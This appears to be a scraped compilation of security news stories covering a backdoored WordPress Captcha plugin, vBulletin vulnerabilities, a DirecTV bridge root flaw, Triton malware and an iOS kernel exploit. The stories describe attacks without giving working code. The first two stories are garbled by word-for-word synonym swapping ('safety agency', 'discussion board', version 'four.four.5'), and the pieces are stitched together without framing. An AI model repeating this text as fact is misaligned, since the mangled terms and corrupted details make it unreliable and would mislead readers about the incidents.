Hidden Backdoor Discovered In WordPress Captcha Plugin Impacts Over 300,000 Websites

Shopping for in style plugins with a big user-base and utilizing it for easy

One such incident occurred just lately when the famend developer BestWebSoft offered a well-liked Captcha WordPress plugin to an undisclosed purchaser, who then modified the plugin to obtain and set up a hidden backdoor.

In a blog post revealed on Tuesday, WordFence safety agency revealed why WordPress just lately kicked a well-liked Captcha plugin with greater than 300,000 lively installations out of its official plugin retailer.

Whereas reviewing the supply code of the Captcha plugin, WordFence people discovered a extreme backdoor that might permit the plugin writer or attackers to remotely achieve administrative entry to WordPress web sites with out requiring any authentication.

The plugin was configured to robotically pull an up to date “backdoored” model from a distant URL — https[://]simplywordpress[dot]internet/captcha/captcha_pro_update.php — after set up from the official WordPress repository with out website admin consent.


This backdoor code was designed to create a login session for the attacker, who’s the plugin writer on this case, with administrative privileges, permitting them to achieve entry to any of the 300,000 web sites (utilizing this plugin) remotely with out requiring any authentication.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself’” reads the WordFence weblog submit. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Additionally, the modified code pulled from the distant server is nearly similar to the code in legit plugin repository, subsequently “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was by no means there and serving to the attacker keep away from detection.


he rationale behind the including a backdoor is unclear at this second, but when somebody pays a good-looking quantity to purchase a well-liked plugin with a big consumer base, there have to be a robust motive behind.

In related instances, now we have seen how organized cyber gangs acquire popular plugins and purposes to stealthy infect their giant consumer base with malware, adware, and adware.

Whereas determining the precise identification of the Captcha plugin purchaser, WordFence researchers discovered that the simplywordpress[dot]internet area serving the backdoor file was registered to somebody named “Stacy Wellington” utilizing the e-mail deal with “scwellington[at]hotmail.co.uk.”

Utilizing reverse whois lookup, the researchers discovered a lot of different domains registered to the identical consumer, together with Convert me Popup, Dying To Feedback, Human Captcha, Sensible Recaptcha, and Social Alternate.

What’s attention-grabbing? The entire above-mentioned domains booked below the consumer contained the identical backdoor code that the WordFence researchers present in Captcha.

WordFence has teamed up with WordPress to patch the affected model of Captcha plug-in and blocked the writer from publishing updates, so web sites directors are extremely beneficial to interchange their plugin with the newest official Captcha model four.four.5.

WordFence has promised to launch in-depth technical particulars on how the backdoor set up and execution works, together with a proof-of-concept exploit after 30 days in order that admins get sufficient time to patch their web sites.

Two Critical 0-Day Remote Exploits for vBulletin Forum Disclosed Publicly

Safety researchers have found and disclosed particulars of two unpatched essential vulnerabilities in a well-liked web discussion board software program—vBulletin—one in all which might enable a distant attacker to execute malicious code on the newest model of vBulletin utility server.

vBulletin is a broadly used proprietary Web discussion board software program bundle primarily based on PHP and MySQL database server. It powers greater than 100,000 web sites on the Web, together with Fortune 500 and Alexa Prime 1 million firms web sites and boards.

The vulnerabilities have been found by a safety researcher from Italy-based safety agency TRUEL IT and an unknown unbiased safety researcher, who disclosed the main points of the vulnerabilities by Past Safety’s SecuriTeam Safe Disclosure program.

The vulnerabilities have an effect on model 5 of the vBulletin discussion board software program and are at present unpatched. Past Safety claims, it tried to contact vBulletin since November 21, 2017, however obtained no response from the corporate.

vBulletin Distant Code Execution Vulnerability

The primary vulnerability discovered in vBulletin is a file inclusion problem that results in distant code execution, permitting a distant attacker to incorporate any file from the vBulletin server and execute arbitrary PHP code.

An unauthenticated attacker can set off the file inclusion vulnerability by sending a GET request to index.php with the routestring= parameter within the request, finally permitting the attacker to “create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server.”

The researcher has additionally supplied Proof-of-Idea (PoC) exploit code to point out the exploitation of the vulnerability. A Frequent Vulnerabilities and Exposures (CVE) quantity has not been assigned to this explicit vulnerability.

vBulletin Distant Arbitrary File Deletion Vulnerability

The second vulnerability discovered within the vBulletin discussion board software program model 5 has been assigned CVE-2017-17672 and described as a deserialization problem that an unauthenticated attacker can exploit to delete arbitrary information and even execute malicious code “under certain circumstances.”

The vulnerability is because of unsafe utilization of PHP’s unserialize() on user-supplied enter, which permits an unauthenticated hacker to delete arbitrary information and probably execute arbitrary code on a vBulletin set up.

A publicly uncovered API, known as vB_Library_Template’s cacheTemplates() perform, permits fetching info on a set of given templates from the database to retailer them inside a cache variable.

Zero-Day Remote ‘Root’ Exploit Disclosed In AT&T DirecTV WVB Devices

Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months.

The problem is with a core component of the Genie DVR system that’s shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who’ve signed up to DirecTV service at risk.

The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers.

DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers’ Genie client boxes (up to 8) that are plugged into their TVs around the home.

Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device’s web server, without requiring any authentication.

When trying to browse to the wireless bridge’s web server on the device, Lawshae was expecting a login page or similar, but instead, he found “a wall of text streaming before [his] eyes.”

Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more.

What’s more worrisome was that the device was accepting his commands remotely and that too at the “root” level, meaning Lawshae could have run software, exfiltrate data, encrypt files, and do almost anything he wanted on the Linksys device.

“It literally took 30 seconds of looking at this device to find and verify an unauthenticated, remote root command injection vulnerability. It was at this point that I became pretty frustrated,” Lawshae wrote in an advisory published Wednesday on Trend Micro-owned Zero Day Initiative (ZDI) website.

“The vendors involved here should have had some form of secure development to prevent bugs like this from shipping. More than that, we as security practitioners have failed to affect the changes needed in the industry to prevent these simple yet impactful bugs from reaching unsuspecting consumers.”

Lawshae also provided a video, demonstrating how a quick and straightforward hack let anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device.

TRITON Malware used to shut down plant, industrial systems

Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned.

On Thursday, cybersecurity researchers from FireEye’s Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East.

The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity.

Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec — while it is early days into the investigation — the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage.

Google Researcher Releases iOS Exploit—Could Enable iOS 11 Jailbreak

As promised last week, Google’s Project Zero researcher Ian Beer now publicly disclosed an exploit that works on almost all 64-bit Apple devices running iOS 11.1.2 or earlier, which can be used to build an iOS jailbreak, allowing users to run apps from non-Apple sources.

On Monday morning, Beer shared the details on the exploit, dubbed “tfp0,” which leveraged double-free memory corruption vulnerabilities in the kernel, the core of the operating system.

Here, “tfp0” stands for “task for pid 0” or the kernel task port—which gives users full control over the core of the operating system.The Project Zero researcher responsibly reported these vulnerabilities to Apple in October, which were patched by the company with the release of iOS 11.2 on 2nd December.

While Beer says he has successfully tested his proof of concept exploit on the iPhone 6s and 7, and iPod Touch 6G, he believes that his exploit should work on all 64-bit Apple devices.

Another security researcher confirmed that the exploit released by Beer also works on his Apple TvOS 11.x and TV 4K running iOS 11.1.2.

What’s worse? Since Apple’s iOS mobile operating system and macOS desktop operating system share the same code base, the kernel for macOS is also vulnerable to the bug, according to a report published by Project Zero on Google’s Chromium Blog.

Beer said he has also successfully tested the vulnerability on macOS 10.13, running on a MacBook Air 5.2, which Apple patched in macOS 10.13.1.Earlier versions of the operating systems are still vulnerable to the exploit, which basically grants complete core access to the operating system and that is really what the jailbreak community requires.

Although we have not heard any news about iOS jailbreaks from the jailbreak community from very long, Beer’s exploit could be the basis for a future iOS 11 jailbreak, allowing iPhone and iPad users to install third-party OS customizations via apps that are restricted by Apple.

If iOS 11.1.2 jailbreak surfaces in upcoming days, you can still downgrade to iOS 11.1.2 using iTunes even if you have updated to iOS 11.2 because Apple is still signing the operating system.